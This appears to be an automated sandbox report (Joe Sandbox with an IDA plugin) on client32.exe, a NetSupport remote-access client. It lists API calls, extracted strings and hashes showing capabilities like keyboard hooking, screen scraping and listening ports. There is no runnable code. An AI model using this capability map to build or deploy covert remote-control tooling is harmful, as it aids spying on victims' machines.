                                                                              • Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                              • Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59

                                                                              Control-flow Graph: first block 1705 at 110aa170-110aa1d2 (legend: Executed / Not Executed)
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(setupapi.dll,AB86ACF8,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,111856D8), ref: 110AA1A3
                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110AA1C7
                                                                              • SetupDiGetClassDevsA.SETUPAPI(111A7EDC,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF), ref: 110AA1E1
                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110AA20C
                                                                              • _free.LIBCMT ref: 110AA240
                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA252
                                                                              • GetLastError.KERNEL32 ref: 110AA27D
                                                                              • _malloc.LIBCMT ref: 110AA293
                                                                              • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA2B5
                                                                              • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA2E7
                                                                              • SetLastError.KERNEL32(00000078), ref: 110AA2FB
                                                                              • GetLastError.KERNEL32 ref: 110AA301
                                                                              • _free.LIBCMT ref: 110AA313
                                                                              • SetLastError.KERNEL32(00000078), ref: 110AA324
                                                                              • SetLastError.KERNEL32(00000078), ref: 110AA331
                                                                              • _free.LIBCMT ref: 110AA344
                                                                              • FreeLibrary.KERNEL32(?,?), ref: 110AA354
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA3F8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                              • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                              • API String ID: 3464732724-3340099623
                                                                              • Opcode ID: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
                                                                              • Instruction ID: 5c4fa76f58df98f84a8804f3b2f927c1121c913996f050c4ed1f836ab53a5840
                                                                              • Opcode Fuzzy Hash: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
                                                                              • Instruction Fuzzy Hash: CE818472D40219EBEB04DFE4ED88F9EBBB8AF44704F104528F922A76C4DB759945CB50

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102E501
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: $18/11/16 11:28:14 V12.10F20$562258$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                              • API String ID: 1029625771-878608103
                                                                              • Opcode ID: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                              • Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
                                                                              • Opcode Fuzzy Hash: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                              • Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(User32.dll,00000000,?), ref: 11142063
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 111420D3
                                                                              • LoadLibraryA.KERNEL32(imm32,?,?,00000000,?), ref: 111420F6
                                                                              • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
                                                                              • _memset.LIBCMT ref: 11142169
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 111421B9
                                                                              • GetStockObject.GDI32(00000000), ref: 111421C3
                                                                              • RegisterClassExA.USER32(?), ref: 111421DA
                                                                              • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,?), ref: 11142272
                                                                              • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11142287
                                                                              • SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
                                                                              • #17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
                                                                              • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,?), ref: 111423E3
                                                                                • Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,AB86ACF8,11030346,00000000), ref: 11017A6E
                                                                                • Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                • Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                • Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                • Part of subcall function 110CCC90: CreateWindowExA.USER32(00000000,button,11195264,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CCCC9
                                                                                • Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                              • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                              • API String ID: 3706574701-3145203681
                                                                              • Opcode ID: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                              • Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
                                                                              • Opcode Fuzzy Hash: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                              • Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,73AA1370,?,0000001A), ref: 11028CFD
                                                                              • _strrchr.LIBCMT ref: 11028D0C
                                                                                • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileModuleName__stricmp_l_strrchr
                                                                              • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                              • API String ID: 1609618855-357498123
                                                                              • Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                              • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                              • Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                              • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • RegOpenKeyExA.KERNEL32 ref: 11030F12
                                                                              • RegCloseKey.KERNEL32(?), ref: 11031037
                                                                                • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                              • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                              • InterlockedExchange.KERNEL32(01578D80,00001388), ref: 110313BA
                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
                                                                              • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
                                                                              • API String ID: 1620732580-3468083601
                                                                              • Opcode ID: 57ef328ae7d238af9a72f0207df80887d2bea8460ebc5795ade3b7fe5304f569
                                                                              • Instruction ID: ba3a9277cc9c02863ea6a287e3bfaf4f3c25cdbc6a51068d255f8e3b0b30a81f
                                                                              • Opcode Fuzzy Hash: 57ef328ae7d238af9a72f0207df80887d2bea8460ebc5795ade3b7fe5304f569
                                                                              • Instruction Fuzzy Hash: A0D10AB0E153659FEF11CBB48C84BEEFBF4AB84308F1445E9E419A7284EB756A40CB51

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 11086A5C
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
                                                                              • LoadLibraryA.KERNEL32(?), ref: 11086ABC
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 11086AEC
                                                                              • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 11086AFD
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 11086B0E
                                                                              • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 11086B1F
                                                                              • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086B30
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                              • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                              • API String ID: 2201880244-3035937465
                                                                              • Opcode ID: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                              • Instruction ID: dace89b413b7c80efca81dff4c2248eaeba40c207e9952549beb6cb8df15ad3c
                                                                              • Opcode Fuzzy Hash: ae871db5d7610564588830e50a3b7e849eec5d3f4cd297b35e657d5bd847a740
                                                                              • Instruction Fuzzy Hash: 6551D174A043499BD710DF7ADC80AA6FBE8AF54308B1685AED889C7684DB71E844CF54
                                                                              APIs
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 111424BA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$IKS.LIC$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 3535843008-1834795898
                                                                              • Opcode ID: 94a73b77105bd84d94668242f28501390e16c566680df690e894548eff980490
                                                                              • Instruction ID: 10cc70918df64a5c5cf34de13f95fa07aae05e5e56373ca92022ad8c72469b22
                                                                              • Opcode Fuzzy Hash: 94a73b77105bd84d94668242f28501390e16c566680df690e894548eff980490
                                                                              • Instruction Fuzzy Hash: 69420874E002699FEB11CB60DD50FEEFB75AF95708F1040D8D909A7681EB72AAC4CB61

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • InitializeCriticalSection.KERNEL32(0000000C,?,?), ref: 11074DB5
                                                                              • InitializeCriticalSection.KERNEL32(00000024,?,?), ref: 11074DBB
                                                                              • InitializeCriticalSection.KERNEL32(0000003C,?,?), ref: 11074DC1
                                                                              • InitializeCriticalSection.KERNEL32(0000DB1C,?,?), ref: 11074DCA
                                                                              • InitializeCriticalSection.KERNEL32(00000054,?,?), ref: 11074DD0
                                                                              • InitializeCriticalSection.KERNEL32(0000006C,?,?), ref: 11074DD6
                                                                              • _strncpy.LIBCMT ref: 11074E38
                                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,?), ref: 11074E9F
                                                                              • CreateThread.KERNEL32(00000000,00004000,Function_00070F90,00000000,00000000,?), ref: 11074F3C
                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 11074F43
                                                                              • SetTimer.USER32(00000000,00000000,000000FA,110641A0), ref: 11074F87
                                                                              • std::exception::exception.LIBCMT ref: 11075038
                                                                              • __CxxThrowException@8.LIBCMT ref: 11075053
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalInitializeSection$ChangeCloseCreateEnvironmentException@8ExpandFindNotificationStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                              • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                              • API String ID: 328462399-1497550179
                                                                              • Opcode ID: ab7e60a43ed30bbed14256cc4f133f9afa5d8c2c4f84f2114a22e1cdf39ff5f9
                                                                              • Instruction ID: be8de8c7dcaf1f52642e817c04f951357ea42bbf71f0edf47656a93d7d63f3b4
                                                                              • Opcode Fuzzy Hash: ab7e60a43ed30bbed14256cc4f133f9afa5d8c2c4f84f2114a22e1cdf39ff5f9
                                                                              • Instruction Fuzzy Hash: 0FB1C6B5E40359AFD711CBA4CD84FD9FBF4BB48304F0045A9E64997281EBB0B944CB65

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                              • PostMessageA.USER32(00040270,000006CF,00000007,00000000), ref: 11139C4F
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • SetWindowTextA.USER32(00040270,00000000), ref: 11139CF7
                                                                              • IsWindowVisible.USER32(00040270), ref: 11139DBC
                                                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11139DDC
                                                                              • IsWindowVisible.USER32(00040270), ref: 11139DEA
                                                                              • SetForegroundWindow.USER32(00000000), ref: 11139E18
                                                                              • EnableWindow.USER32(00040270,00000001), ref: 11139E27
                                                                              • IsWindowVisible.USER32(00040270), ref: 11139E78
                                                                              • IsWindowVisible.USER32(00040270), ref: 11139E85
                                                                              • EnableWindow.USER32(00040270,00000000), ref: 11139E99
                                                                              • EnableWindow.USER32(00040270,00000000), ref: 11139DFF
                                                                                • Part of subcall function 11132120: ShowWindow.USER32(00040270,00000000,?,11139EA2,00000007,?,?,?,?,?,00000000), ref: 11132144
                                                                              • EnableWindow.USER32(00040270,00000001), ref: 11139EAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                              • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                              • API String ID: 3453649892-3803836183
                                                                              • Opcode ID: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                              • Instruction ID: ba9ac0b981c1f0862d5fa69d940274f40709b6541bdede94fe31ed47de48390e
                                                                              • Opcode Fuzzy Hash: 77f0fc716c5108730fe3721f30b933414b82ace8a427d74df6603177c94951ec
                                                                              • Instruction Fuzzy Hash: 64C12B75A1127A9BEB11DBE0CD81FAAF766ABC032DF040438E9159B28CF775E444C791

                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 11030645
                                                                              • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11030797
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostwsprintf
                                                                              • String ID: *ListenPort$Client$Default$Global\NSMWClassAdmin$NSMWClass$NSMWControl32$NSSWControl32$NSTWControl32$Ready$TCPIP$TraceIPC$UseIPC$_debug
                                                                              • API String ID: 875889313-3431570279
                                                                              • Opcode ID: 52e4332a4f1a6695b503962eca77932fd89c869ac73ece535db52d27cb53eafb
                                                                              • Instruction ID: 917d364d5c6b0b603fb0f9ba81c7ab37e2e4bb2b49ece13a51dcd12a3dfde8f6
                                                                              • Opcode Fuzzy Hash: 52e4332a4f1a6695b503962eca77932fd89c869ac73ece535db52d27cb53eafb
                                                                              • Instruction Fuzzy Hash: C251FC74F42366AFE712CBE0CC55F69F7957B84B0CF200064E6156B6C9DAB0B540CB95
                                                                              APIs
                                                                              • GetNativeSystemInfo.KERNEL32(?), ref: 110310D9
                                                                              • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                              • InterlockedExchange.KERNEL32(01578D80,00001388), ref: 110313BA
                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
                                                                              • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                              • API String ID: 1428277488-3745656997
                                                                              • Opcode ID: 7ab4675b5621614b5560d1b38db1ee70649d60d135089b240ffcc9cb50bab512
                                                                              • Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
                                                                              • Opcode Fuzzy Hash: 7ab4675b5621614b5560d1b38db1ee70649d60d135089b240ffcc9cb50bab512
                                                                              • Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                              • InterlockedExchange.KERNEL32(01578D80,00001388), ref: 110313BA
                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                              • _sprintf.LIBCMT ref: 11031401
                                                                              • _setlocale.LIBCMT ref: 1103140B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
                                                                              • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                              • API String ID: 4242130455-3745656997
                                                                              • Opcode ID: 9ce7f7efe95e834453681c4923fbfa899ecbeaf8ae4f254e48ac6de1b4bac228
                                                                              • Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
                                                                              • Opcode Fuzzy Hash: 9ce7f7efe95e834453681c4923fbfa899ecbeaf8ae4f254e48ac6de1b4bac228
                                                                              • Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              • wsprintfA.USER32 ref: 11028814
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
                                                                              • wsprintfA.USER32 ref: 11028891
                                                                              • CloseHandle.KERNEL32(?), ref: 110288A7
                                                                              • CloseHandle.KERNEL32(?), ref: 110288B0
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                              • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                              • API String ID: 512045693-419896573
                                                                              • Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                              • Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
                                                                              • Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                              • Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(PCIINV.DLL,AB86ACF8,037D6AE0,037D6AD0,?,00000000,1118368C,000000FF,?,11032002,037D6AE0,00000000,?,?,?), ref: 11086115
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                              • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108613B
                                                                              • GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108614F
                                                                              • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11086163
                                                                              • wsprintfA.USER32 ref: 110861EB
                                                                              • wsprintfA.USER32 ref: 11086202
                                                                              • wsprintfA.USER32 ref: 11086219
                                                                              • CloseHandle.KERNEL32(00000000,11085F40,00000001,00000000), ref: 1108636A
                                                                                • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,74DEF550,?,?,11086390,?,11032002,037D6AE0,00000000,?,?,?), ref: 11085D68
                                                                                • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,74DEF550,?,?,11086390,?,11032002,037D6AE0,00000000,?,?,?), ref: 11085D7B
                                                                                • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,74DEF550,?,?,11086390,?,11032002,037D6AE0,00000000,?,?,?), ref: 11085D8E
                                                                                • Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,11086390,?,11032002,037D6AE0,00000000,?,?,?), ref: 11085DA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
